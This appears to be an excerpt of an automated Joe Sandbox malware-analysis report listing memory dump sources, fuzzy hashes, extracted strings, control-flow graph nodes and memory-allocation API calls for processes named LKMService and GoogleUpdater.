                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f7c1827d0b28d56c58447912acfc58977718455e055184fb97faf327f977398
                  • Instruction ID: 39cdbf0e56fb1eebae13e28946ef734db28f8ac00fc62cb74356e1a020710084
                  • Opcode Fuzzy Hash: 2f7c1827d0b28d56c58447912acfc58977718455e055184fb97faf327f977398
                  • Instruction Fuzzy Hash: EBF0FF353052948FC3168B2EDC549567BF9EF8A72532A84AAE545CB376C730EC81C751
                  Memory Dump Source
                  • Source File: 00000002.00000002.4657277683.000000000073D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_73d000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3f4cc7ec5643ad0d7a7656318a63e002844a03274c670d6fd97f1d157607dd1
                  • Instruction ID: 1e0a6be3898e5c36a19887d4c6fdc09ac60b3676c54ae8e76f19a23df3bc7b1c
                  • Opcode Fuzzy Hash: a3f4cc7ec5643ad0d7a7656318a63e002844a03274c670d6fd97f1d157607dd1
                  • Instruction Fuzzy Hash: CAF0C2724053449AF7208A05D984B63FF98EB91724F18C45AED080F293C3789C44CB71
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 283f8b27e915754a1cbe1d204f832b00b4fddabd9f88862a6ddb0d79bcc98ea5
                  • Instruction ID: a0de20f7662a6905d4e6f9d3f652ab10830e44ad666f3dc27b72a3d1ae9ee897
                  • Opcode Fuzzy Hash: 283f8b27e915754a1cbe1d204f832b00b4fddabd9f88862a6ddb0d79bcc98ea5
                  • Instruction Fuzzy Hash: 8CF0BD35300554CFC3199B6EC844C16B7E9EFC976532685A9D609CB775CB70DC81C750
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1beebfb76cbcf3512647746d288e20accc8c8458f2cc36ad43ea732ccafc632
                  • Instruction ID: 10c3dacf4d56b4ed3f70a585f895f4103948e2126a5b9c98d512296a31a40339
                  • Opcode Fuzzy Hash: e1beebfb76cbcf3512647746d288e20accc8c8458f2cc36ad43ea732ccafc632
                  • Instruction Fuzzy Hash: 72F082302067408FC3669B79C815565BBF6EF8A32135484BEE449DB772CE35EC45C790
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bdeb71493c78bdb628290c892036eb67845dfc9a9ec1ae44e65b5970425dfb02
                  • Instruction ID: a1c0466ea8fb516831e2a5467a1bf4c49a191dbd636ab73d9a017051974250c2
                  • Opcode Fuzzy Hash: bdeb71493c78bdb628290c892036eb67845dfc9a9ec1ae44e65b5970425dfb02
                  • Instruction Fuzzy Hash: A4E0DF31108790AFC717976EEC1488BBFA9CDC2720314CAAFE18D87522DEA56C0683A1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 56ccb673211bdfbd6762de675b7dc8684878b366a92a53cf111ca413aa2f67c9
                  • Instruction ID: d3333ec02fd3e65733f3214b6cae5145ab94f2f78b3fec604b2197d9ee7145b4
                  • Opcode Fuzzy Hash: 56ccb673211bdfbd6762de675b7dc8684878b366a92a53cf111ca413aa2f67c9
                  • Instruction Fuzzy Hash: B3E0ED753605209F83489B6DD445C1D73EAEFC9B7531142AAF519CB3B2CE61DC018BD1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d0798ae11a080aba5b5dcdaede50c44cd46db89f58e7b65e7d9d756f0b74ce03
                  • Instruction ID: bc3d6e24bf9867f7e6e8ebc14c4100a2c8b8f9bbe4c040810888651d29043a6b
                  • Opcode Fuzzy Hash: d0798ae11a080aba5b5dcdaede50c44cd46db89f58e7b65e7d9d756f0b74ce03
                  • Instruction Fuzzy Hash: 87E04F353100209F8344EB6ED444C19B3EAEFC9B2131140BAF509CB332CE61EC018BD1
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
                  • Instruction ID: 871708be24fbc4908398b69efd551809693d5e107a0e1557f2aa692bef97404a
                  • Opcode Fuzzy Hash: 4a61d386ec51859675473db5fd237224e25c0f3a28e7cfed5f727cc55293960a
                  • Instruction Fuzzy Hash: ECE04F357006108F8726AB3AD45191A73EBAFCE32135404BDE10ACBB62CE32EC42CBD0
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f5f7cbf2ced0bcb2553bc6537befca9aa7ffd2ab8d52d2d091a8097bdea3c74d
                  • Instruction ID: 102817d5983f0e90fb143ac9eeb39c6b342fd7f44670a18c31e3e4f39007680e
                  • Opcode Fuzzy Hash: f5f7cbf2ced0bcb2553bc6537befca9aa7ffd2ab8d52d2d091a8097bdea3c74d
                  • Instruction Fuzzy Hash: AFE0E5346016108FC369AB39D405916B7E6AF8A32535044BDE40A8BB62CB32EC41CB80
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 253cc26d0cac3377d79909c97177c9b4df2b1c071999f0bc0a0c91bd66be3509
                  • Instruction ID: 50a0658bf4db3b0ecad920c24313752ab38a7ced71a24d28ebb7f8b39ba32d8b
                  • Opcode Fuzzy Hash: 253cc26d0cac3377d79909c97177c9b4df2b1c071999f0bc0a0c91bd66be3509
                  • Instruction Fuzzy Hash: F1D0C734A00208EF8B04DFB4D94566CB7BAEB89300B0080B9E50AE7200EB351E01AB40
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 93c78c44d64bd14c757d204808b0fbd3acaca722eab83fc3580ab8cead069848
                  • Instruction ID: bf92b59119f7a879cec05de9dcc3f0722cd3695b307eb0305da903c35377d667
                  • Opcode Fuzzy Hash: 93c78c44d64bd14c757d204808b0fbd3acaca722eab83fc3580ab8cead069848
                  • Instruction Fuzzy Hash: B6D05E343006108F8B45AB69D405819B7EAEF8D62531040A9E809CB722DE32EC028BD4
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eba3798b4b99cf65727c8a1573092afb2df2b1c9152ce4f83e2c996730fc8b5e
                  • Instruction ID: 10ebc998c3b4ba3993ca5c4ab542d86f38770a75563a6a7b73e6f1ba9c5dc8de
                  • Opcode Fuzzy Hash: eba3798b4b99cf65727c8a1573092afb2df2b1c9152ce4f83e2c996730fc8b5e
                  • Instruction Fuzzy Hash: F0D09E752183848FD311C758E858C61BFA9DB4961071A81EAE948CB3B7D634EC14CA55
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction ID: 9296968168dc781c90d4903bd4a652d90f833b81b725e2d1c3109315a36b6d73
                  • Opcode Fuzzy Hash: 0fadde3145d2930c6a991fc31f49c97a98c094205af05f2f55702de6350c4070
                  • Instruction Fuzzy Hash: 81C002392542048F8344DB58E588C11B7E9EB4C624316C195E90D8B332C631FC00CA44
                  Strings
                  Memory Dump Source
                  • Source File: 00000002.00000002.4659709004.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_2_2_9e0000_LKMService.jbxd
                  Similarity
                  • API ID:
                  • String ID: q$q$q$q
                  • API String ID: 0-594874556
                  • Opcode ID: e4b754f6f7423ddd09e42774b73b565f141c56c262a99254c38abb0478583054
                  • Instruction ID: d890e4a7b8506d170a88e8e640fabfc25a536edd430a44c503b5e5c06319d467
                  • Opcode Fuzzy Hash: e4b754f6f7423ddd09e42774b73b565f141c56c262a99254c38abb0478583054
                  • Instruction Fuzzy Hash: 11319E26E4C2C25BD307746D28621FE3B5A5972370F4401ABDC85DF3D3E5068C9B13A5

                  Execution Graph

                  Execution Coverage:31%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:6
                  Total number of Limit Nodes:0
                  execution_graph 7344 50e6230 7345 50e627b NtAllocateVirtualMemory 7344->7345 7347 50e62c2 7345->7347 7348 50e5d50 7349 50e5d9e NtProtectVirtualMemory 7348->7349 7351 50e5de8 7349->7351
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: j'R$&03$9!7J$;.%
                  • API String ID: 0-3501266285
                  • Opcode ID: 3a2baa96c9d2b2119c90e5c90fa34f09091ccd4990367214c2c8b14bc375b03c
                  • Instruction ID: 19e73e289b418fac419b95e892669840318cfef7deae85e47ccce3abf6b186a7
                  • Opcode Fuzzy Hash: 3a2baa96c9d2b2119c90e5c90fa34f09091ccd4990367214c2c8b14bc375b03c
                  • Instruction Fuzzy Hash: 6FE31B75E112298FDB64DF68C890A9DB7B6BB88300F5145E9E809F7351DB31AE81CF90

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1203 120b7b8-120b7c6 1204 120b7c8-120b7d4 1203->1204 1206 120b882-120b88d 1204->1206 1207 120b7da 1204->1207 1208 120b893-120b8ab 1206->1208 1209 120b7df-120b7fa 1206->1209 1207->1209 1208->1204 1213 120b8b1-120b8bc 1208->1213 1212 120b800-120b802 1209->1212 1214 120b804-120b811 1212->1214 1215 120b849-120b857 1212->1215 1216 120b8c2 1213->1216 1217 120bb0e-120bb23 1213->1217 1214->1204 1218 120b813-120b834 1214->1218 1241 120b871-120b87d 1215->1241 1242 120b859-120b85f 1215->1242 1219 120b930-120b93c 1216->1219 1220 120b9c1-120b9e4 1216->1220 1221 120ba41-120ba4f 1216->1221 1222 120b972-120b994 1216->1222 1223 120bae2-120bb09 1216->1223 1224 120bab6-120badd 1216->1224 1225 120b908-120b92b 1216->1225 1226 120b8c9-120b903 1216->1226 1227 120b999-120b9bc 1216->1227 1228 120b9e9-120ba14 call 12099a0 1216->1228 1229 120ba19-120ba3c 1216->1229 1230 120ba7d-120ba88 1216->1230 1246 120bb25-120bb51 1217->1246 1247 120bb56-120bb6c 1217->1247 1218->1215 1251 120b836-120b83c 1218->1251 1219->1204 1231 120b942-120b96d 1219->1231 1274 120bcb4-120bcbb 1220->1274 1221->1204 1234 120ba55-120ba78 1221->1234 1222->1274 1223->1274 1224->1274 1225->1274 1226->1274 1227->1274 1228->1274 1229->1274 1230->1204 1235 120ba8e-120bab1 1230->1235 1231->1274 1234->1274 1235->1274 1241->1274 1253 120b861 1242->1253 1254 120b863-120b86f 1242->1254 1246->1274 1247->1215 1256 120bb72-120bb84 1247->1256 1251->1209 1260 120b83e-120b847 1251->1260 1253->1241 1254->1241 1276 120bb86-120bba9 1256->1276 1277 120bbae-120bbb6 1256->1277 1260->1215 1276->1274 1277->1204 1290 120bbbc-120bbce 1277->1290 1297 120bbd0-120bbd8 1290->1297 1298 120bc06-120bc2e 1290->1298 1297->1212 1299 120bbde-120bc01 1297->1299 1303 120bc30-120bc5f 1298->1303 1304 120bc89-120bca6 call 120cfb0 1298->1304 1299->1274 1303->1209 1308 120bc65-120bc87 1303->1308 1309 120bca9-120bcb2 call 1208f70 1304->1309 1308->1274 1309->1274
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: 9x=]$t~
                  • API String ID: 0-258036425
                  • Opcode ID: d94495400b9be2bf644e79956f03b9e3306d6732fc25dff877c0729c70fd846c
                  • Instruction ID: 1325716d9994a695e50aafa3dd77b463b286a1f0d77681ddc1e37c232437a32d
                  • Opcode Fuzzy Hash: d94495400b9be2bf644e79956f03b9e3306d6732fc25dff877c0729c70fd846c
                  • Instruction Fuzzy Hash: 6DD1A179B201218F8B59EB7DD85992D77F2AFCD71030541B8E906EB3A2DE60EC05CB91

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1317 120c480-120c48f 1318 120c494-120c4aa 1317->1318 1320 120c4b0 1318->1320 1321 120c536-120c582 1318->1321 1322 120c4b6-120c4ba 1320->1322 1328 120c7c0-120c7d4 1321->1328 1329 120c588 1321->1329 1323 120c4f1-120c501 1322->1323 1324 120c4bc-120c4c2 1322->1324 1344 120c503-120c50c 1323->1344 1345 120c524 1323->1345 1326 120c4c8-120c4d7 1324->1326 1327 120c58f-120c5af 1324->1327 1326->1323 1360 120c4d9-120c4e1 1326->1360 1386 120c992-120c999 1327->1386 1331 120c4e3-120c4ee 1328->1331 1332 120c7da-120c7f9 1328->1332 1329->1327 1333 120c6b3-120c6d2 call 12099a0 1329->1333 1334 120c5b4-120c5d4 1329->1334 1335 120c754-120c778 1329->1335 1336 120c625-120c645 1329->1336 1337 120c6d7-120c6e3 1329->1337 1338 120c5d9-120c5fa 1329->1338 1339 120c64a-120c663 1329->1339 1340 120c6fc-120c704 1329->1340 1341 120c77d-120c791 1329->1341 1342 120c68e-120c6ae 1329->1342 1343 120c72f-120c74f 1329->1343 1331->1323 1368 120c840-120c86e 1332->1368 1369 120c7fb-120c7ff 1332->1369 1333->1386 1334->1386 1335->1386 1336->1386 1380 120c6eb-120c6f7 1337->1380 1338->1326 1346 120c600-120c620 1338->1346 1339->1318 1351 120c669-120c689 1339->1351 1340->1318 1350 120c70a-120c72a 1340->1350 1341->1322 1348 120c797-120c7bb 1341->1348 1342->1386 1343->1386 1354 120c513-120c520 1344->1354 1355 120c50e-120c511 1344->1355 1358 120c527-120c529 call 120cc88 1345->1358 1346->1386 1348->1386 1350->1386 1351->1386 1365 120c522 1354->1365 1355->1365 1378 120c52f-120c531 1358->1378 1360->1318 1360->1331 1365->1358 1396 120c870-120c874 1368->1396 1397 120c8c1-120c8d4 1368->1397 1382 120c801-120c803 1369->1382 1383 120c805-120c80e 1369->1383 1378->1386 1380->1386 1390 120c823-120c83b 1382->1390 1391 120c810-120c813 1383->1391 1392 120c81d-120c820 1383->1392 1390->1386 1391->1392 1392->1390 1404 120c886-120c88f 1396->1404 1405 120c876-120c87c 1396->1405 1417 120c906-120c91c 1397->1417 1418 120c8d6-120c8e2 1397->1418 1412 120c891-120c894 1404->1412 1413 120c89e-120c8a1 1404->1413 1405->1318 1411 120c882-120c884 1405->1411 1416 120c8a4-120c8bc 1411->1416 1412->1413 1413->1416 1416->1386 1423 120c97a-120c990 call 1208f70 1417->1423 1424 120c91e-120c928 1417->1424 1418->1323 1419 120c8e8-120c901 1418->1419 1419->1386 1423->1386 1426 120c949-120c951 1424->1426 1427 120c92a-120c947 1424->1427 1430 120c953-120c978 1426->1430 1427->1430 1430->1386
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: t~
                  • API String ID: 0-899910758
                  • Opcode ID: b73efaa85a9836e5809a456e1b092dbb6527dcc6327272f2cb42c10da1771b9f
                  • Instruction ID: 05f13386cee32ee0045f0933931f5e24604122c2e402655942f2e25a259a7cca
                  • Opcode Fuzzy Hash: b73efaa85a9836e5809a456e1b092dbb6527dcc6327272f2cb42c10da1771b9f
                  • Instruction Fuzzy Hash: 38D1E175B201268FCB0AEB6CC85557EB6E2FBC9310B0556A8E906FB3D2DA709D01C7D1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1438 50e5d49-50e5de6 NtProtectVirtualMemory 1442 50e5def-50e5e14 1438->1442 1443 50e5de8-50e5dee 1438->1443 1443->1442
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 050E5DD9
                  Memory Dump Source
                  • Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 675caa9e2a5cb87dbdfa2fe806d681f2da723da353483c2c488a2617f85bfcdd
                  • Instruction ID: 0a8ba68a1b02abd9a44c1e999d4f362c66a1295099664a2e62eb700750f18c25
                  • Opcode Fuzzy Hash: 675caa9e2a5cb87dbdfa2fe806d681f2da723da353483c2c488a2617f85bfcdd
                  • Instruction Fuzzy Hash: 982113B1D013099FDB10CFAAD984A9EFBF5FF88310F20842AE519A7240D775A910CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1447 50e5d50-50e5de6 NtProtectVirtualMemory 1450 50e5def-50e5e14 1447->1450 1451 50e5de8-50e5dee 1447->1451 1451->1450
                  APIs
                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 050E5DD9
                  Memory Dump Source
                  • Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: d6a9be904b0bd9d1262b880de3ef424de649b11a4c96d5f62ea59e9f584b0238
                  • Instruction ID: 81f6c436093be41846f865f6aed7d4db548cc682dd5a2981683127dbf12642ff
                  • Opcode Fuzzy Hash: d6a9be904b0bd9d1262b880de3ef424de649b11a4c96d5f62ea59e9f584b0238
                  • Instruction Fuzzy Hash: CA2100B1D013499FDB10DFAAD984ADEFBF5FF88310F20842AE519A7200C775A910CBA1

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1455 50e6230-50e62c0 NtAllocateVirtualMemory 1458 50e62c9-50e62ee 1455->1458 1459 50e62c2-50e62c8 1455->1459 1459->1458
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 050E62B3
                  Memory Dump Source
                  • Source File: 00000003.00000002.4672090407.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_50e0000_GoogleUpdater.jbxd
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 7c8199dff64c1ad39ed0c2e5606a2fe74ec6a4bf541df4fbe85a104813760148
                  • Instruction ID: c5289abdb121bf451a5569d3c802170637a1216fbd6080477e41d94402026ce4
                  • Opcode Fuzzy Hash: 7c8199dff64c1ad39ed0c2e5606a2fe74ec6a4bf541df4fbe85a104813760148
                  • Instruction Fuzzy Hash: 2821E4B19003499FDF10DFAAD885ADEFBF5FF48310F10841AE519A7210C7759954CBA5

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1520 1209187-1209195 1521 1209181-1209185 1520->1521 1522 1209197-12091aa 1520->1522 1523 12091ac-1209242 1522->1523 1529 1209244-1209247 1523->1529 1530 1209267-120928e 1523->1530 1529->1530 1531 1209249-120925f 1529->1531 1534 1209294-120929f 1530->1534 1531->1530 1537 1209580-1209587 1534->1537 1538 12092a5-12092d4 1534->1538 1537->1523 1539 120958d-1209593 1537->1539 1540 1209535-120954c 1538->1540 1541 12092da-12092f8 1538->1541 1540->1538 1542 1209552-1209560 1540->1542 1541->1538 1543 12092fa-1209333 1541->1543 1542->1537 1544 1209562-1209578 1542->1544 1543->1540 1545 1209339-1209378 1543->1545 1544->1537 1545->1540 1546 120937e-120938c 1545->1546 1546->1538 1547 1209392-1209401 1546->1547 1547->1523 1553 1209407-1209509 1547->1553 1553->1523 1557 120950f-120952e 1553->1557 1557->1540
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: 1O^
                  • API String ID: 0-971112054
                  • Opcode ID: 7a20cc852316708bb3a3413496d0777779ad89d0cc333940fe2385c2078db04a
                  • Instruction ID: b7cfc75c0a78606842fe8611ede2abbed68b25ebddaec378edf5c2981d9ba713
                  • Opcode Fuzzy Hash: 7a20cc852316708bb3a3413496d0777779ad89d0cc333940fe2385c2078db04a
                  • Instruction Fuzzy Hash: 4DB11775E002099FDB58DFAAD451A9DBBF2FF98300B10C1AAE529E7351E7389A45CF10

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1679 120c1b8-120c1c1 1680 120c1c3-120c1d0 call 120a0a8 1679->1680 1683 120c1d5-120c215 call 1209a30 1680->1683 1688 120c218-120c248 call 1209a30 1683->1688 1691 120c24a-120c268 call 1209a30 1688->1691 1691->1683 1694 120c26e-120c28d 1691->1694 1694->1691 1696 120c28f-120c293 1694->1696 1697 120c2e1-120c2e7 1696->1697 1698 120c295-120c29b 1696->1698 1697->1680 1699 120c2ed-120c2fc 1697->1699 1698->1688 1700 120c2a1-120c2c8 1698->1700 1714 120c2ff call 120c480 1699->1714 1715 120c2ff call 120c450 1699->1715 1716 120c2ff call 120c3d8 1699->1716 1700->1697 1703 120c2ca-120c2db 1700->1703 1701 120c305-120c335 1706 120c337-120c33d 1701->1706 1707 120c37a-120c380 1701->1707 1703->1697 1706->1683 1709 120c343-120c374 1706->1709 1707->1688 1708 120c386-120c3ba 1707->1708 1708->1697 1712 120c3c0-120c3c7 1708->1712 1709->1707 1714->1701 1715->1701 1716->1701
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID: 3G.
                  • API String ID: 0-3978388015
                  • Opcode ID: 6a0958f42cd756e7cfcda01336abc5f1c41f3fcc08af44d362b8da02dc4291ee
                  • Instruction ID: a6412e0bccc5e3c6961af75967d080799c5138673d32a69ab904679ecb065784
                  • Opcode Fuzzy Hash: 6a0958f42cd756e7cfcda01336abc5f1c41f3fcc08af44d362b8da02dc4291ee
                  • Instruction Fuzzy Hash: 6F51E373F201258FCB18DFACC49456DB6E6AF9821175642A9DD0AFB3A2DA35CC41CBC0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1933 1209ac5-1209adc 1934 1209ae1-1209b15 call 1209a30 1933->1934 1937 1209b1b-1209b4c call 1208c38 1934->1937 1941 1209b4e-1209b69 1937->1941 1942 1209b6f-1209b99 1937->1942 1941->1942 1942->1937 1945 1209b9b-1209be5 1942->1945 1945->1941 1947 1209beb-1209c25 1945->1947 1950 1209db2-1209dda call 12098a0 1947->1950 1951 1209c2b-1209c4c 1947->1951 1950->1942 1955 1209de0-1209e0c 1950->1955 1951->1937 1956 1209c52-1209c7a 1951->1956 1958 1209e0e-1209e1a 1955->1958 1959 1209e5f-1209eb8 call 12098a0 call 1201098 call 1208d68 1955->1959 1956->1941 1957 1209c80 1956->1957 1960 1209d91-1209da6 1957->1960 1958->1937 1962 1209e20-1209e24 1958->1962 1989 1209ebd-1209f23 1959->1989 1964 1209c85-1209ca6 call 1209a30 1960->1964 1965 1209dac 1960->1965 1966 120a032-120a046 1962->1966 1967 1209e2a-1209e4e 1962->1967 1981 1209ce2-1209cf2 1964->1981 1982 1209ca8-1209cb4 1964->1982 1965->1950 1970 120a04d-120a0b3 1966->1970 1969 1209e54-1209e59 1967->1969 1967->1970 1969->1959 1969->1966 1976 120a0bb-120a15e 1970->1976 1977 120a0b6 call 12095b0 1970->1977 1977->1976 1981->1934 1985 1209cf8-1209d8e call 12098a0 1981->1985 1982->1934 1983 1209cba-1209cdc 1982->1983 1983->1981 1985->1960 1991 1209f46-1209f52 1989->1991 1992 1209f54-1209f63 1991->1992 1993 1209f25-1209f33 1991->1993 1992->1993 1999 1209f65-1209f78 1992->1999 1995 1209f35-1209f41 1993->1995 1996 1209f7a 1993->1996 1995->1991 2000 1209f7f 1996->2000 1999->2000 2000->1966
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62dd168ffc820328e09636dea9177a3678eb6097544329e53a8af22b2fc76df2
                  • Instruction ID: de75a608225332f9d401218616a7a4a53ac8d2559fb36664c73909fca189c7bc
                  • Opcode Fuzzy Hash: 62dd168ffc820328e09636dea9177a3678eb6097544329e53a8af22b2fc76df2
                  • Instruction Fuzzy Hash: 66F1F171B143158FDB15CF79C8D06ADBBF2BF99200B55826AE50AEB392DB709C85CB40
                  Memory Dump Source
                  • Source File: 00000003.00000002.4659166677.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_1200000_GoogleUpdater.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d89cb85d513f51ceac8bad1a8426f9e0067784dbcaef5bddfa01891a9ca16d1
                  • Instruction ID: fb6f5a65c776d90f0a83dcdce68ac64024411d56fe4372471be911abab031d98
                  • Opcode Fuzzy Hash: 5d89cb85d513f51ceac8bad1a8426f9e0067784dbcaef5bddfa01891a9ca16d1
                  • Instruction Fuzzy Hash: 17314D77F205394B9B14CEADDC901AEB2E6AB8416070A823ADD4AEB792D574CC09C7D0

                  Control-flow Graph

                  • Executed
                  • Not Executed
